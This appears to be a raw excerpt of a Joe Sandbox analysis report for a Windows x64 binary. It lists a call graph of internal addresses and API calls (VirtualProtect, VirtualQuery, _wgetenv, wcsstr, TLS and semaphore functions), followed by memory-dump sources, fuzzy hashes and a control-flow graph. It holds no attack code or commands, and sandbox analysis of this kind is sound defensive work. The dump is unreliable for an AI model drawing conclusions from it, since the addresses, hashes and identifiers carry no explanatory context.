API calls 4680->4681 4682 7ff69af12941 4681->4682 4683 7ff69af16790 19 API calls 4682->4683 4684 7ff69af12950 4683->4684 4684->4684 4685 7ff69af16790 19 API calls 4684->4685 4686 7ff69af12a53 4685->4686 4687 7ff69af16790 19 API calls 4686->4687 4688 7ff69af12a62 4687->4688 4689 7ff69af12ae2 memcpy 4688->4689 4690 7ff69af16790 19 API calls 4689->4690 4691 7ff69af12b0b 4690->4691 4692 7ff69af16790 19 API calls 4691->4692 4693 7ff69af12b1a 4692->4693 4694 7ff69af12b53 4693->4694 4695 7ff69af12b24 memcpy 4693->4695 4696 7ff69af11730 19 API calls 4694->4696 4695->4694 4697 7ff69af12bbd 4696->4697 4698 7ff69af11730 19 API calls 4697->4698 4699 7ff69af12bcf 4698->4699 4700 7ff69af16790 19 API calls 4699->4700 4701 7ff69af12bdb 4700->4701 4702 7ff69af16790 19 API calls 4701->4702 4703 7ff69af12bea 4702->4703 4703->4523 4704 7ff69af12c39 _wcsicmp 4703->4704 4705 7ff69af12c61 4703->4705 4704->4523 4704->4703 4705->4473 4707 7ff69af15630 4706->4707 4709 7ff69af154c2 4706->4709 4707->4499 4708 7ff69af1556e 4708->4499 4708->4708 4709->4708 4710 7ff69af15682 4709->4710 4712 7ff69af1552c VirtualQuery 4709->4712 4711 7ff69af15430 4 API calls 4710->4711 4720 7ff69af15691 4711->4720 4713 7ff69af1555a 4712->4713 4714 7ff69af15665 4712->4714 4713->4708 4717 7ff69af155e0 VirtualProtect 4713->4717 4714->4710 4716 7ff69af15430 4 API calls 4714->4716 4715 7ff69af156c2 4715->4499 4716->4710 4717->4708 4718 7ff69af1561c GetLastError 4717->4718 4718->4707 4719 7ff69af15430 4 API calls 4718->4719 4719->4707 4720->4715 4723 7ff69af15982 4720->4723 4732 7ff69af1574b 4720->4732 4721 7ff69af154a0 4 API calls 4721->4723 4722 7ff69af15a02 4724 7ff69af15430 4 API calls 4722->4724 4723->4715 4723->4721 4725 7ff69af159d5 4723->4725 4727 7ff69af15a0e 4724->4727 4726 7ff69af15430 4 API calls 4725->4726 4728 7ff69af159ee 4726->4728 4727->4499 4730 7ff69af15430 4 API calls 4728->4730 4729 7ff69af1596c 4731 7ff69af154a0 4 API calls 4729->4731 4730->4722 4733 7ff69af1597d 4731->4733 4732->4715 4732->4722 4732->4725 4732->4728 4732->4729 4734 7ff69af15823 4732->4734 4735 7ff69af154a0 VirtualQuery VirtualProtect GetLastError VirtualProtect 4732->4735 4733->4499 4734->4715 4736 7ff69af15852 VirtualProtect 4734->4736 4735->4732 4736->4734 4741 7ff69af1545c 4737->4741 4738 7ff69af1556e 4738->4496 4738->4738 4739 7ff69af15682 4740 7ff69af15430 4 API calls 4739->4740 4750 7ff69af15691 4740->4750 4741->4738 4741->4739 4742 7ff69af1552c VirtualQuery 4741->4742 4743 7ff69af15665 4742->4743 4745 7ff69af1555a 4742->4745 4743->4739 4746 7ff69af15430 4 API calls 4743->4746 4744 7ff69af156c2 4744->4496 4745->4738 4747 7ff69af155e0 VirtualProtect 4745->4747 4746->4739 4747->4738 4748 7ff69af1561c GetLastError 4747->4748 4748->4738 4749 7ff69af15430 4 API calls 4748->4749 4749->4738 4750->4744 4753 7ff69af15982 4750->4753 4762 7ff69af1574b 4750->4762 4751 7ff69af154a0 4 API calls 4751->4753 4752 7ff69af15a02 4754 7ff69af15430 4 API calls 4752->4754 4753->4744 4753->4751 4755 7ff69af159d5 4753->4755 4757 7ff69af15a0e 4754->4757 4756 7ff69af15430 4 API calls 4755->4756 4758 7ff69af159ee 4756->4758 4757->4496 4760 7ff69af15430 4 API calls 4758->4760 4759 7ff69af1596c 4761 7ff69af154a0 4 API calls 4759->4761 4760->4752 4763 7ff69af1597d 4761->4763 4762->4744 4762->4752 4762->4755 4762->4758 4762->4759 4764 7ff69af15823 4762->4764 4765 7ff69af154a0 VirtualQuery VirtualProtect GetLastError VirtualProtect 4762->4765 4763->4496 4764->4744 4766 7ff69af15852 VirtualProtect 4764->4766 4765->4762 4766->4764 4768 7ff69af167ae 4767->4768 4774 7ff69af167c8 4767->4774 4768->4509 4769 7ff69af167d1 GetLastError TlsGetValue SetLastError 4770 7ff69af167ff 4769->4770 4771 7ff69af168b0 4769->4771 4773 7ff69af1680b 4770->4773 4783 7ff69af169e3 abort 4770->4783 4789 7ff69af16925 memset 4770->4789 4782 7ff69af168d0 4771->4782 4771->4783 4772 7ff69af1695a 4772->4769 4775 7ff69af16967 4772->4775 4773->4768 4778 7ff69af16819 4773->4778 4774->4769 4774->4772 4776 7ff69af16941 4774->4776 4777 7ff69af16992 4774->4777 4781 7ff69af1685c 4774->4781 4775->4509 4899 7ff69af16730 CreateSemaphoreW TlsAlloc 4776->4899 4780 7ff69af169ac 4777->4780 4777->4781 4892 7ff69af16690 4778->4892 4779 7ff69af169bc WaitForSingleObject 4790 7ff69af1686a 4779->4790 4786 7ff69af169b0 Sleep 4780->4786 4781->4772 4781->4779 4781->4790 4787 7ff69af168d3 TlsSetValue 4782->4787 4794 7ff69af169f5 4783->4794 4786->4786 4791 7ff69af169ba 4786->4791 4787->4773 4792 7ff69af168ea GetLastError 4787->4792 4788 7ff69af16821 4788->4768 4789->4787 4790->4769 4790->4775 4793 7ff69af1688f ReleaseSemaphore 4790->4793 4791->4781 4792->4773 4793->4769 4794->4509 4796 7ff69af140e1 4795->4796 4797 7ff69af1b9f8 wcscat 4796->4797 4797->4522 4798 7ff69b29d3f3 4797->4798 4904 7ff69af16600 4799->4904 4803 7ff69af13a80 4913 7ff69af131e0 4803->4913 4805 7ff69af13aa3 4805->4566 4948 7ff69af14160 memset 4806->4948 4808 7ff69af145bc 4808->4543 4954 7ff69af14320 wcslen 4809->4954 4812 7ff69af14160 23 API calls 4813 7ff69af14773 4812->4813 4813->4549 4815 7ff69af1175a 4814->4815 4819 7ff69af11781 4814->4819 4816 7ff69af16790 19 API calls 4815->4816 4817 7ff69af11772 4816->4817 4818 7ff69af16790 19 API calls 4817->4818 4818->4819 4819->4627 4959 7ff69af14000 4820->4959 4822 7ff69af1157f 4823 7ff69af11598 memset 4822->4823 4824 7ff69af11583 memset 4822->4824 4825 7ff69af16790 19 API calls 4823->4825 4824->4635 4826 7ff69af115dc 4825->4826 4827 7ff69af16790 19 API calls 4826->4827 4828 7ff69af115eb 4827->4828 4829 7ff69af16790 19 API calls 4828->4829 4830 7ff69af1167f 4829->4830 4831 7ff69af16790 19 API calls 4830->4831 4832 7ff69af1168e 4831->4832 4833 7ff69af116e1 _wgetenv 4832->4833 4834 7ff69af140d0 wcscat 4833->4834 4835 7ff69af116f8 4834->4835 4962 7ff69af14c20 4835->4962 4837 7ff69af1171f 4839 7ff69af16790 19 API calls 4838->4839 4840 7ff69af13b42 4839->4840 4841 7ff69af16790 19 API calls 4840->4841 4842 7ff69af13b51 4841->4842 4843 7ff69af140d0 wcscat 4842->4843 4844 7ff69af13bb1 4843->4844 4845 7ff69af14320 26 API calls 4844->4845 4846 7ff69af13bb9 memcpy 4845->4846 4847 7ff69af16790 19 API calls 4846->4847 4848 7ff69af13bdf 4847->4848 4849 7ff69af13c90 4848->4849 4850 7ff69af13bf2 4848->4850 4851 7ff69af16790 19 API calls 4849->4851 4852 7ff69af16790 19 API calls 4850->4852 4853 7ff69af13c95 memcpy 4851->4853 4854 7ff69af13bf7 4852->4854 4853->4854 4855 7ff69af13a30 35 API calls 4854->4855 4856 7ff69af13c52 4855->4856 4857 7ff69af14580 23 API calls 4856->4857 4858 7ff69af13c5f 4857->4858 4985 7ff69af14840 4858->4985 4860 7ff69af13c6a 4861 7ff69af13c7b 4860->4861 4862 7ff69af16790 19 API calls 4860->4862 4861->4657 4863 7ff69af13cf8 4862->4863 4864 7ff69af16790 19 API calls 4863->4864 4865 7ff69af13d07 4864->4865 4866 7ff69af13d5f wcsstr 4865->4866 4867 7ff69af13d6f 4866->4867 4868 7ff69af13d84 4866->4868 4867->4657 4869 7ff69af16790 19 API calls 4868->4869 4870 7ff69af13db0 4869->4870 4871 7ff69af16790 19 API calls 4870->4871 4872 7ff69af13dbf 4871->4872 4873 7ff69af13e17 wcsstr 4872->4873 4873->4867 4874 7ff69af13e2b 4873->4874 4875 7ff69af16790 19 API calls 4874->4875 4876 7ff69af13e37 4875->4876 4877 7ff69af16790 19 API calls 4876->4877 4878 7ff69af13e46 4877->4878 4879 7ff69af13e94 wcsstr 4878->4879 4879->4867 4880 7ff69af13ea8 4879->4880 4881 7ff69af16790 19 API calls 4880->4881 4882 7ff69af13eb4 4881->4882 4883 7ff69af16790 19 API calls 4882->4883 4884 7ff69af13ec3 4883->4884 4885 7ff69af13f11 wcsstr 4884->4885 4885->4867 4886 7ff69af13f25 4885->4886 4887 7ff69af16790 19 API calls 4886->4887 4888 7ff69af13f6b 4887->4888 4889 7ff69af16790 19 API calls 4888->4889 4891 7ff69af13f7a 4889->4891 4890 7ff69af13fde wcsstr 4890->4861 4891->4890 4891->4891 4893 7ff69af166a7 malloc 4892->4893 4894 7ff69af166e0 malloc 4892->4894 4895 7ff69af16722 abort 4893->4895 4896 7ff69af166b5 4893->4896 4894->4895 4894->4896 4897 7ff69af166c8 memcpy 4896->4897 4898 7ff69af1670a memset 4896->4898 4897->4788 4898->4788 4900 7ff69af16780 GetLastError 4899->4900 4901 7ff69af16763 4899->4901 4900->4901 4902 7ff69af16788 abort 4901->4902 4903 7ff69af1677b 4901->4903 4903->4781 4905 7ff69af13a40 memset 4904->4905 4906 7ff69af16a20 4905->4906 4907 7ff69af16a2e 4906->4907 4908 7ff69af16a70 4906->4908 4934 7ff69af183d0 4907->4934 4910 7ff69af183d0 2 API calls 4908->4910 4912 7ff69af16a85 4910->4912 4911 7ff69af16a47 4911->4803 4912->4803 4925 7ff69af131f6 4913->4925 4914 7ff69af132ce memset 4915 7ff69af16790 19 API calls 4914->4915 4916 7ff69af13315 4915->4916 4917 7ff69af137c8 4916->4917 4918 7ff69af13328 4916->4918 4919 7ff69af16790 19 API calls 4917->4919 4920 7ff69af16790 19 API calls 4918->4920 4927 7ff69af137cd 4919->4927 4922 7ff69af1332d 4920->4922 4921 7ff69af16790 19 API calls 4921->4925 4923 7ff69af140d0 wcscat 4922->4923 4924 7ff69af1335b wcslen 4923->4924 4924->4927 4928 7ff69af1336f memset wcscpy wcslen 4924->4928 4925->4921 4926 7ff69af1394e wcsncmp 4925->4926 4932 7ff69af13295 4925->4932 4926->4925 4926->4932 4929 7ff69af1382e 4927->4929 4930 7ff69af133be memset wcscpy wcslen 4927->4930 4928->4929 4928->4930 4931 7ff69af133f2 wcslen wcslen wcslen 4929->4931 4930->4931 4933 7ff69af134b0 4931->4933 4932->4914 4933->4805 4936 7ff69af18402 4934->4936 4935 7ff69af1848e 4937 7ff69af184af 4935->4937 4943 7ff69af16da0 4935->4943 4936->4935 4939 7ff69af16da0 2 API calls 4936->4939 4941 7ff69af1853d 4936->4941 4937->4911 4939->4936 4940 7ff69af16da0 2 API calls 4940->4941 4941->4940 4942 7ff69af18b40 4941->4942 4942->4911 4944 7ff69af16dba 4943->4944 4945 7ff69af16eca fwprintf 4944->4945 4946 7ff69af16f01 fwprintf 4944->4946 4947 7ff69af16ddd 4944->4947 4945->4947 4946->4947 4947->4937 4949 7ff69af16790 19 API calls 4948->4949 4950 7ff69af141af 4949->4950 4951 7ff69af16790 19 API calls 4950->4951 4952 7ff69af141be 4951->4952 4953 7ff69af14211 wcscpy wcscat wcslen 4952->4953 4953->4808 4958 7ff69af14350 4954->4958 4955 7ff69af1436e memset wcscpy 4956 7ff69af14160 23 API calls 4955->4956 4956->4958 4957 7ff69af14425 4957->4812 4958->4955 4958->4957 4960 7ff69af14017 memset wcscpy wcslen 4959->4960 4961 7ff69af140a6 4959->4961 4960->4961 4961->4822 4969 7ff69af148d0 4962->4969 4964 7ff69af14c43 4965 7ff69af131e0 32 API calls 4964->4965 4968 7ff69af14c50 4964->4968 4966 7ff69af14c93 4965->4966 4966->4968 4972 7ff69af14b00 4966->4972 4968->4837 4978 7ff69af14440 4969->4978 4971 7ff69af148e6 4971->4964 4975 7ff69af14b14 4972->4975 4974 7ff69af14b41 4977 7ff69af14b45 4974->4977 4983 7ff69af14ab0 memset 4974->4983 4981 7ff69af14a40 memset 4975->4981 4977->4968 4979 7ff69af14160 23 API calls 4978->4979 4980 7ff69af14472 4979->4980 4980->4971 4982 7ff69af14a79 4981->4982 4982->4974 4984 7ff69af14ae7 4983->4984 4984->4977 4986 7ff69af14160 23 API calls 4985->4986 4987 7ff69af14869 4986->4987 4987->4860 5081 7ff69af19260 5084 7ff69af18f50 5081->5084 5085 7ff69af18f63 5084->5085 5086 7ff69af1aa60 6 API calls 5085->5086 5087 7ff69af18f84 5086->5087 5333 7ff69af191e0 5334 7ff69af1ab60 5 API calls 5333->5334 5335 7ff69af191e8 5334->5335 5336 7ff69af18f50 6 API calls 5335->5336 5337 7ff69af19210 5336->5337 5088 7ff69af15a66 5089 7ff69af15a91 5088->5089 5090 7ff69af15af3 5089->5090 5091 7ff69af15a9f 5089->5091 5092 7ff69af15b12 signal 5089->5092 5098 7ff69af15ae5 5089->5098 5093 7ff69af15b00 5090->5093 5094 7ff69af15adc 5090->5094 5096 7ff69af15b50 5090->5096 5091->5096 5097 7ff69af15ab0 5091->5097 5091->5098 5092->5094 5095 7ff69af15b28 signal 5092->5095 5093->5092 5093->5094 5093->5098 5094->5098 5100 7ff69af15c00 signal 5094->5100 5095->5098 5096->5094 5096->5098 5099 7ff69af15b5e signal 5096->5099 5097->5094 5097->5098 5101 7ff69af15ac6 signal 5097->5101 5099->5094 5102 7ff69af15c19 signal 5099->5102 5100->5098 5101->5094 5103 7ff69af15c30 signal 5101->5103 5102->5098 5103->5098 5104 7ff69af18869 5105 7ff69af188a3 5104->5105 5106 7ff69af18890 5104->5106 5108 7ff69af178e0 15 API calls 5105->5108 5110 7ff69af178e0 5106->5110 5109 7ff69af18c39 5108->5109 5109->5109 5111 7ff69af178f4 5110->5111 5112 7ff69af1792b 5111->5112 5113 7ff69af17960 5111->5113 5122 7ff69af17800 5112->5122 5126 7ff69af16c80 5113->5126 5123 7ff69af17836 5122->5123 5136 7ff69af16f20 5123->5136 5125 7ff69af178a1 5127 7ff69af16c94 5126->5127 5127->5127 5149 7ff69af16af0 5127->5149 5129 7ff69af16cce 5130 7ff69af18fe0 5129->5130 5132 7ff69af1ab60 5130->5132 5131 7ff69af17977 5131->5105 5132->5131 5133 7ff69af1a940 4 API calls 5132->5133 5134 7ff69af1ab87 5133->5134 5134->5131 5135 7ff69af1abb0 LeaveCriticalSection 5134->5135 5139 7ff69af16f42 5136->5139 5137 7ff69af170d2 5143 7ff69af170f1 5137->5143 5145 7ff69af16d20 5137->5145 5139->5137 5140 7ff69af171d0 5139->5140 5141 7ff69af16fbb 5139->5141 5142 7ff69af16d20 4 API calls 5140->5142 5140->5143 5141->5137 5144 7ff69af16da0 2 API calls 5141->5144 5142->5143 5143->5125 5144->5141 5146 7ff69af16d50 5145->5146 5148 7ff69af16d2f 5145->5148 5147 7ff69af1b710 4 API calls 5146->5147 5147->5148 5148->5143 5150 7ff69af16b0c 5149->5150 5151 7ff69af16c15 5149->5151 5150->5151 5160 7ff69af16b2f 5150->5160 5152 7ff69af16c28 5151->5152 5153 7ff69af16c5a fwprintf 5151->5153 5154 7ff69af16c6e fwprintf 5152->5154 5155 7ff69af16c35 fwprintf 5152->5155 5156 7ff69af16c41 5153->5156 5154->5156 5155->5156 5156->5129 5157 7ff69af16b49 5157->5129 5158 7ff69af16b6b strlen 5159 7ff69af1b710 4 API calls 5158->5159 5159->5160 5160->5157 5160->5158 5161 7ff69af16170 5162 7ff69af16187 5161->5162 5163 7ff69af16200 5161->5163 5164 7ff69af161b1 calloc 5162->5164 5165 7ff69af16198 _assert 5162->5165 5164->5163 5166 7ff69af161c8 TlsGetValue TlsSetValue 5164->5166 5165->5164 5341 7ff69af185f4 5342 7ff69af1861b 5341->5342 5343 7ff69af18c00 5341->5343 5352 7ff69af17450 5342->5352 5344 7ff69af17450 15 API calls 5343->5344 5346 7ff69af18c1a 5344->5346 5346->5346 5347 7ff69af18584 5348 7ff69af186bc 5347->5348 5349 7ff69af18d8f wcslen 5347->5349 5350 7ff69af16da0 2 API calls 5348->5350 5351 7ff69af186d4 5350->5351 5353 7ff69af17464 5352->5353 5354 7ff69af174e0 5353->5354 5355 7ff69af174a4 5353->5355 5356 7ff69af16c80 8 API calls 5354->5356 5357 7ff69af16f20 6 API calls 5355->5357 5358 7ff69af174ef 5356->5358 5359 7ff69af174b3 5357->5359 5360 7ff69af18fe0 5 API calls 5358->5360 5362 7ff69af18fe0 5 API calls 5359->5362 5361 7ff69af174f7 5360->5361 5361->5347 5363 7ff69af174d7 5362->5363 5363->5347 5171 7ff69af1ba79 LeaveCriticalSection 5364 7ff69af1b9f8 wcscat 5365 7ff69b29d3f3 5364->5365 5172 7ff69af14280 5173 7ff69af14160 23 API calls 5172->5173 5174 7ff69af142b2 5173->5174 5178 7ff69af15280 5179 7ff69af15292 5178->5179 5180 7ff69af152a2 5179->5180 5181 7ff69af15de0 3 API calls 5179->5181 5182 7ff69af152e7 5181->5182 5366 7ff69af14100 wcscpy wcslen 5367 7ff69af1412d 5366->5367 5368 7ff69af11500 5369 7ff69af11180 103 API calls 5368->5369 5370 7ff69af11516 5369->5370 5183 7ff69af1b780 ___lc_codepage_func ___mb_cur_max_func 5184 7ff69af1b7c1 5183->5184 5185 7ff69af1b7d9 5183->5185 5184->5185 5186 7ff69af1b7d2 5184->5186 5189 7ff69af1b840 5184->5189 5186->5185 5188 7ff69af1b5a0 4 API calls 5186->5188 5187 7ff69af1b5a0 4 API calls 5187->5189 5188->5186 5189->5185 5189->5187 5190 7ff69af18688 5191 7ff69af18694 5190->5191 5192 7ff69af186bc 5191->5192 5193 7ff69af18d8f wcslen 5191->5193 5194 7ff69af16da0 2 API calls 5192->5194 5195 7ff69af186d4 5194->5195 5196 7ff69af1858e 5197 7ff69af18a47 5196->5197 5198 7ff69af185bd 5196->5198 5200 7ff69af16da0 2 API calls 5197->5200 5199 7ff69af16af0 8 API calls 5198->5199 5202 7ff69af18584 5199->5202 5201 7ff69af18a68 5200->5201 5203 7ff69af186bc 5202->5203 5204 7ff69af18d8f wcslen 5202->5204 5205 7ff69af16da0 2 API calls 5203->5205 5206 7ff69af186d4 5205->5206 5371 7ff69af18a0e 5372 7ff69af16da0 2 API calls 5371->5372 5373 7ff69af18a2b 5372->5373 5373->5373 5374 7ff69af15310 5375 7ff69af1532f 5374->5375 5376 7ff69af15366 fprintf 5375->5376 5377 7ff69af11010 5378 7ff69af1104b 5377->5378 5379 7ff69af1106d __set_app_type 5378->5379 5380 7ff69af11077 5378->5380 5379->5380 5212 7ff69af19290 5213 7ff69af19299 5212->5213 5214 7ff69af1aa60 6 API calls 5213->5214 5215 7ff69af192ae 5214->5215 5216 7ff69af191e0 5215->5216 5221 7ff69af1934f 5215->5221 5244 7ff69af1ab60 5216->5244 5219 7ff69af18f50 6 API calls 5230 7ff69af19210 5219->5230 5220 7ff69af19759 5221->5220 5223 7ff69af19520 5221->5223 5224 7ff69af19771 5221->5224 5241 7ff69af1955f 5221->5241 5222 7ff69af18f20 6 API calls 5222->5241 5250 7ff69af18f20 5223->5250 5224->5222 5224->5241 5226 7ff69af1ab60 5 API calls 5227 7ff69af19a24 5226->5227 5229 7ff69af1ab60 5 API calls 5227->5229 5232 7ff69af19710 5227->5232 5228 7ff69af1ab60 5 API calls 5228->5230 5229->5232 5231 7ff69af1ac90 6 API calls 5231->5241 5232->5228 5233 7ff69af1adf0 10 API calls 5233->5241 5234 7ff69af199c1 5235 7ff69af19c60 5234->5235 5254 7ff69af1abd0 5234->5254 5237 7ff69af1aa60 6 API calls 5239 7ff69af1a4f6 memcpy 5237->5239 5238 7ff69af199dd 5238->5226 5238->5235 5239->5241 5240 7ff69af1abd0 8 API calls 5240->5241 5241->5231 5241->5232 5241->5233 5241->5234 5241->5235 5241->5237 5241->5238 5241->5240 5243 7ff69af1ab60 Sleep InitializeCriticalSection InitializeCriticalSection EnterCriticalSection LeaveCriticalSection 5241->5243 5261 7ff69af1b0b0 5241->5261 5243->5241 5245 7ff69af191e8 5244->5245 5246 7ff69af1ab6d 5244->5246 5245->5219 5247 7ff69af1a940 4 API calls 5246->5247 5248 7ff69af1ab87 5247->5248 5248->5245 5249 7ff69af1abb0 LeaveCriticalSection 5248->5249 5251 7ff69af18f2c 5250->5251 5252 7ff69af1aa60 6 API calls 5251->5252 5253 7ff69af18f44 5252->5253 5253->5241 5255 7ff69af1abf0 5254->5255 5255->5255 5256 7ff69af1ac1b 5255->5256 5257 7ff69af1aa60 6 API calls 5255->5257 5256->5238 5258 7ff69af1ac4b 5257->5258 5258->5256 5259 7ff69af1ac53 memcpy 5258->5259 5260 7ff69af1ab60 5 API calls 5259->5260 5260->5256 5262 7ff69af1b0cd 5261->5262 5263 7ff69af1b0fb 5261->5263 5262->5263 5265 7ff69af1b200 5262->5265 5264 7ff69af1aa60 6 API calls 5263->5264 5267 7ff69af1b109 5264->5267 5266 7ff69af1aa60 6 API calls 5265->5266 5266->5267 5267->5241 5268 7ff69af1b890 ___mb_cur_max_func ___lc_codepage_func 5269 7ff69af1b5a0 4 API calls 5268->5269 5270 7ff69af1b8dd 5269->5270 5381 7ff69af1aa10 5382 7ff69af1aa30 DeleteCriticalSection 5381->5382 5383 7ff69af1aa25 5381->5383 5384 7ff69af18917 5385 7ff69af18951 5384->5385 5386 7ff69af1893e 5384->5386 5388 7ff69af17980 17 API calls 5385->5388 5390 7ff69af17980 5386->5390 5389 7ff69af18c58 5388->5389 5389->5389 5391 7ff69af17999 5390->5391 5392 7ff69af17aa4 5391->5392 5393 7ff69af179d4 5391->5393 5394 7ff69af16c80 8 API calls 5392->5394 5395 7ff69af17a40 5393->5395 5399 7ff69af179e8 5393->5399 5396 7ff69af17ab3 5394->5396 5397 7ff69af17a44 strlen 5395->5397 5398 7ff69af17a4f 5395->5398 5400 7ff69af18fe0 5 API calls 5396->5400 5397->5398 5404 7ff69af17800 6 API calls 5398->5404 5401 7ff69af179f0 5399->5401 5402 7ff69af17ac4 strlen 5399->5402 5403 7ff69af17abb 5400->5403 5406 7ff69af16f20 6 API calls 5401->5406 5402->5401 5403->5385 5405 7ff69af17a64 5404->5405 5407 7ff69af18fe0 5 API calls 5405->5407 5408 7ff69af17a07 5406->5408 5409 7ff69af17a6c 5407->5409 5410 7ff69af18fe0 5 API calls 5408->5410 5409->5385 5411 7ff69af17a32 5410->5411 5411->5385 5271 7ff69af1899d 5272 7ff69af189a6 5271->5272 5273 7ff69af17300 strlen 5272->5273 5274 7ff69af189b1 5273->5274 5274->5274 5275 7ff69af162a0 5277 7ff69af162af 5275->5277 5276 7ff69af1631e 5277->5276 5278 7ff69af16309 strncmp 5277->5278 5278->5276 5278->5277 5412 7ff69af15f20 5413 7ff69af15f2d 5412->5413 5414 7ff69af15f70 5412->5414 5415 7ff69af15f90 5413->5415 5416 7ff69af15f31 5413->5416 5417 7ff69af16010 InitializeCriticalSection TlsAlloc 5414->5417 5422 7ff69af15f7e 5414->5422 5420 7ff69af15f9c 5415->5420 5421 7ff69af15fc0 TlsGetValue 5415->5421 5418 7ff69af15f36 TlsGetValue 5416->5418 5419 7ff69af15f63 5416->5419 5417->5422 5423 7ff69af15ee0 free 5418->5423 5420->5419 5424 7ff69af15fa5 DeleteCriticalSection 5420->5424 5425 7ff69af15ee0 free 5421->5425 5427 7ff69af15f51 TlsSetValue 5423->5427 5424->5419 5426 7ff69af15fdb TlsSetValue 5425->5426 5428 7ff69af15ee0 free 5426->5428 5427->5419 5429 7ff69af15ff8 TlsFree 5428->5429 5429->5420 5279 7ff69af1baa9 EnterCriticalSection 5430 7ff69af1ba29 VirtualProtect 5287 7ff69af187b1 5290 7ff69af18864 5287->5290 5291 7ff69af187d8 5287->5291 5288 7ff69af16c80 8 API calls 5289 7ff69af18cd9 5288->5289 5289->5288 5290->5289 5292 7ff69af18e65 5290->5292 5291->5289 5291->5292 5296 7ff69af18ee7 5291->5296 5298 7ff69af17af0 5291->5298 5294 7ff69af16c80 8 API calls 5292->5294 5294->5296 5295 7ff69af16c80 8 API calls 5297 7ff69af18f14 5295->5297 5296->5295 5297->5297 5300 7ff69af17b0f 5298->5300 5299 7ff69af17c16 5299->5290 5300->5299 5301 7ff69af16d20 4 API calls 5300->5301 5302 7ff69af16da0 2 API calls 5300->5302 5301->5300 5302->5300 5431 7ff69af18a30 5432 7ff69af18a47 5431->5432 5433 7ff69af16da0 2 API calls 5432->5433 5434 7ff69af18a68 5433->5434 5435 7ff69af19230 5436 7ff69af18f50 6 API calls 5435->5436 5437 7ff69af19211 5436->5437 5303 7ff69af15cb5 5304 7ff69af15ce4 calloc 5303->5304 5305 7ff69af15cd9 5303->5305 5304->5305 5306 7ff69af15cfb EnterCriticalSection LeaveCriticalSection 5304->5306
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$memset$_wgetenv$_wcsicmp$FileModuleName
                                                                                                                                                                                                                                      • String ID: ;CCSS$;CCSS
                                                                                                                                                                                                                                      • API String ID: 3458694336-1817814430
                                                                                                                                                                                                                                      • Opcode ID: 4b8c6a12f787f2b6716ab02252fa4d4ab0274091cda3a2d916eccf0da0cd29e4
                                                                                                                                                                                                                                      • Instruction ID: 8c53a1f5bf2b0e03d6047075e353988d41b353f7d96dc59bad1b067644b176f8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4b8c6a12f787f2b6716ab02252fa4d4ab0274091cda3a2d916eccf0da0cd29e4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CDE27BA2A08B8685EB718B25E8593BA77E1FB957C4F4040B5DA8D87B95EF3CE150C700

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 359 7ff69af131e0-7ff69af1328f call 7ff69af16600 call 7ff69af1516c call 7ff69af150d0 366 7ff69af13840-7ff69af13858 call 7ff69af1516c 359->366 367 7ff69af13295-7ff69af132a1 359->367 371 7ff69af1385d-7ff69af1385f 366->371 368 7ff69af132a9-7ff69af13322 call 7ff69af1511e memset call 7ff69af16790 367->368 380 7ff69af137c8-7ff69af137ff call 7ff69af16790 call 7ff69af15ed0 368->380 381 7ff69af13328-7ff69af13334 call 7ff69af16790 368->381 371->367 373 7ff69af13865-7ff69af13890 371->373 375 7ff69af138b1-7ff69af138c2 373->375 376 7ff69af13898-7ff69af1389c 375->376 377 7ff69af138c4-7ff69af138ee call 7ff69af16790 * 2 375->377 382 7ff69af13a10-7ff69af13a20 376->382 383 7ff69af138a2-7ff69af138ab 376->383 395 7ff69af138f0-7ff69af1391f call 7ff69af15ed0 377->395 396 7ff69af13924-7ff69af13928 377->396 402 7ff69af13808-7ff69af13828 380->402 390 7ff69af13336-7ff69af13347 381->390 391 7ff69af1334d-7ff69af13369 call 7ff69af140d0 wcslen 381->391 382->367 383->375 383->382 390->391 391->402 403 7ff69af1336f-7ff69af133b8 memset wcscpy wcslen 391->403 395->396 400 7ff69af1392a-7ff69af13949 396->400 401 7ff69af1394e-7ff69af1395e wcsncmp 396->401 400->401 401->376 404 7ff69af13964-7ff69af13987 401->404 405 7ff69af1382e-7ff69af13836 402->405 406 7ff69af133be-7ff69af133ee memset wcscpy wcslen 402->406 403->405 403->406 404->367 407 7ff69af1398d-7ff69af139f2 call 7ff69af15100 404->407 408 7ff69af133f2-7ff69af137c4 wcslen * 3 call 7ff69af150d0 * 2 call 7ff69af1510f call 7ff69af150e8 * 2 405->408 406->408 407->368 413 7ff69af139f8-7ff69af13a04 407->413 413->368
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true
